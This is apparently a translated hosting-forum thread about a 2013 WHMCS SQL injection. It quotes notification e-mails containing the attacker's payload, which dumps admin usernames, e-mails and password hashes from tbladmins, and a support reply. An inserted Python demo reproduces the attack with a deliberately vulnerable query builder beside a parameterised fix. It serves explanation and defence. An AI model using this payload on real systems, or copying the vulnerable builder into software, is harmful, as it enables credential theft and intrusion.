• 14-12-2013, 11:41:37
    7th Oct 2013 (10:44)
    xxxxx || Customer
    Hi,

    One of our customers tried to reset the admin password. Is there any security hole or bug that lets someone else reset the password?

    -------------

    Client ID: 1840 - 1:xxx:xxxx@xxxxx.com:56d451d40fxxxxx2f49a3b49811c, 6:xxx:xxxx@xxxxx.com:adad59xxxxx8904325423b728, 19:xxx:xxxx@xxxxx.com:d0c35ecea08a8165xxx0438a6, 20:xxx:xxxx@xxxxx.com:adfa51cexxxx21e88 timson has requested to change his/her details as indicated below:

    Address 2: 'ero' to 'AES_ENCRYPT(1,1), firstname=((SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins))'
    Default Payment Method: '' to ''

    If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

    ---------------

    Client ID: 1840 - jack timson has requested to change his/her details as indicated below:

    City: 'tokyo' to 'AES_ENCRYPT(1,1), firstname=((SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins))'
    Default Payment Method: '' to ''

    If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

    -------------

    Regards.


    ----------------

    We wrote this; let's see what they wrote back to us. Note the ticket date.


    --------------------------------

    Here is the reply. Two or three days after this ticket, a nonstop string of updates came out; after every update there was a problem, we wrote again, and there was another update. But to be fair, they answer instantly.



    7th Oct 2013 (14:27)
    Lawrence || Staff
    Hi Hakan,

    Based on the log entry you've provided, the attacker has only performed a SELECT statement. This particular statement exposes the administrator password hashes. These password hashes, in themselves, are not sufficient to allow the attacker to authenticate into your admin area. The attacker must have the plain text version of the original password (and therefore must find the text which equates to the same hash value as your password).

    If the attacker is able to extract the true admin user password value, they would then need to also know the exact location of the admin login page as well as have access to load it. As described in our recommended further security steps, WHMCS provides an extra layer of protection to help mitigate the unauthorized access into the administrative area by allowing a custom admin folder path. We also recommend restricting IP access to that folder with an htaccess file.

    For more info please see our most recent blog post at http://blog.whmcs.com/

    If you require further assistance, please don't hesitate to let us know.

    Regards,

    Lawrence
    Customer Support
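The change-notification lines quoted in the ticket show the mechanism: the new value submitted for "Address 2" (and for "City") was not a literal string but a SQL fragment, and the client's first name in the next notification had become the concatenated `id:username:email:hash` list from `tbladmins`. The following is an added example, not WHMCS code and not from the ticket. It uses an in-memory SQLite database, so `AES_ENCRYPT` is stubbed and MySQL's multi-argument `GROUP_CONCAT(...) SEPARATOR ...` is rewritten with SQLite's `group_concat(expr, sep)`; the `update_client_vulnerable` query builder, the table columns and the sample admin rows are all assumptions constructed to reproduce the shape of the logged payload. The hardened variant binds every value as a parameter and whitelists column names, so the same payload is stored as an ordinary string.

```python
import sqlite3

# Constructed sample data (not from the ticket): admin ids mirror the ones visible in the
# notification e-mail (1, 6, 19, 20); usernames, e-mails and hashes are made up.
ADMINS = [
    (1, "root", "root@example.com", "56d451d40f000000000000002f49a3b4"),
    (6, "billing", "billing@example.com", "adad590000000000000008904325423b"),
    (19, "support", "support@example.com", "d0c35ecea08a816500000000000438a6"),
    (20, "sales", "sales@example.com", "adfa51ce00000000000000000021e88f"),
]

# Payload in the shape logged on the page, adapted to SQLite's group_concat(expr, sep).
PAYLOAD = (
    "AES_ENCRYPT(1,1), firstname=((SELECT group_concat("
    "id || ':' || username || ':' || email || ':' || password, ', ') FROM tbladmins))"
)


def new_db():
    """Fresh in-memory database with a tbladmins and a tblclients table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    # MySQL has AES_ENCRYPT(); SQLite does not. A stub lets the logged payload parse here.
    conn.create_function("AES_ENCRYPT", 2, lambda value, key: f"enc({value})")
    conn.executescript(
        """
        CREATE TABLE tbladmins (id INTEGER, username TEXT, email TEXT, password TEXT);
        CREATE TABLE tblclients (id INTEGER, firstname TEXT, lastname TEXT,
                                 address2 TEXT, city TEXT);
        """
    )
    conn.executemany("INSERT INTO tbladmins VALUES (?, ?, ?, ?)", ADMINS)
    conn.execute("INSERT INTO tblclients VALUES (1840, 'jack', 'timson', 'ero', 'tokyo')")
    return conn


def update_client_vulnerable(conn, client_id, **fields):
    """Hypothetical vulnerable builder: a value that looks like a SQL function call is
    spliced into the statement unquoted, so the attacker controls the rest of SET."""
    assignments = []
    for col, val in fields.items():
        if val.startswith("AES_ENCRYPT("):
            assignments.append(f"{col}={val}")      # raw user input becomes SQL: the bug
        else:
            assignments.append(f"{col}='{val}'")    # still unsafe (no escaping), shown for contrast
    sql = f"UPDATE tblclients SET {', '.join(assignments)} WHERE id={int(client_id)}"
    conn.execute(sql)
    return sql


ALLOWED_COLUMNS = {"firstname", "lastname", "address2", "city"}


def update_client_safe(conn, client_id, **fields):
    """Hardened builder: column names come from a whitelist, every value is a bound
    parameter, so the payload can only ever be stored as a plain string."""
    for col in fields:
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"column not permitted: {col}")
    set_clause = ", ".join(f"{col}=?" for col in fields)
    conn.execute(f"UPDATE tblclients SET {set_clause} WHERE id=?",
                 (*fields.values(), client_id))


def client_row(conn, client_id):
    return conn.execute(
        "SELECT firstname, lastname, address2 FROM tblclients WHERE id=?", (client_id,)
    ).fetchone()


def demo_vulnerable():
    """Returns (firstname, lastname, address2) after the payload hits the vulnerable path."""
    conn = new_db()
    update_client_vulnerable(conn, 1840, address2=PAYLOAD)
    return client_row(conn, 1840)


def demo_safe():
    """Same payload through the parameterised path: firstname is untouched."""
    conn = new_db()
    update_client_safe(conn, 1840, address2=PAYLOAD)
    return client_row(conn, 1840)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("safe:      ", demo_safe())
```

Run stand-alone, the vulnerable path prints a first name of the form `1:root:root@example.com:56d4..., 6:billing:..., 19:..., 20:...` next to the unchanged last name `timson`, which is the pattern seen in the ticket's notification e-mail; the safe path leaves `jack` in place and stores the whole payload literally in `address2`.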
  • 23-12-2013, 20:51:43
    I think another new update has just been released.
  • 23-12-2013, 21:08:05
    Quote from member DHS:
    I think another new update has just been released.
    A new update has been distributed; has anyone updated yet?
  • 23-12-2013, 21:10:47
    My advice: don't install it right away and embarrass yourselves. Let it be downloaded around the world and feedback collected, then update (unless they are critical updates).

    Otherwise you'll be the first to get burned, and you'll end up friends with the WHMCS team.
  • 23-12-2013, 22:16:06
    I updated, no problem.
    In fact there was one issue, and they have fixed that too.
    In the admin area:
    reports.php?report=new_customers&show=signups&show=orderscompleted
    The chart was broken in the previous update.
  • 23-12-2013, 22:21:37
    Updates were done, because so many people probing for vulnerabilities have sprung up lately that we can't risk anything. Sure, the panel may break and you restore a backup, but restoring a backup is better than getting hacked.

    To the friend who says you'll end up friends with WHMCS: forget friendship, lately we have practically become relatives.
  • 23-12-2013, 22:31:49
    Update done; I didn't run into any problems.
  • 14-01-2014, 20:15:58
    Mission complete.
  • 21-01-2014, 16:46:56
    Congratulations on 5.2.16.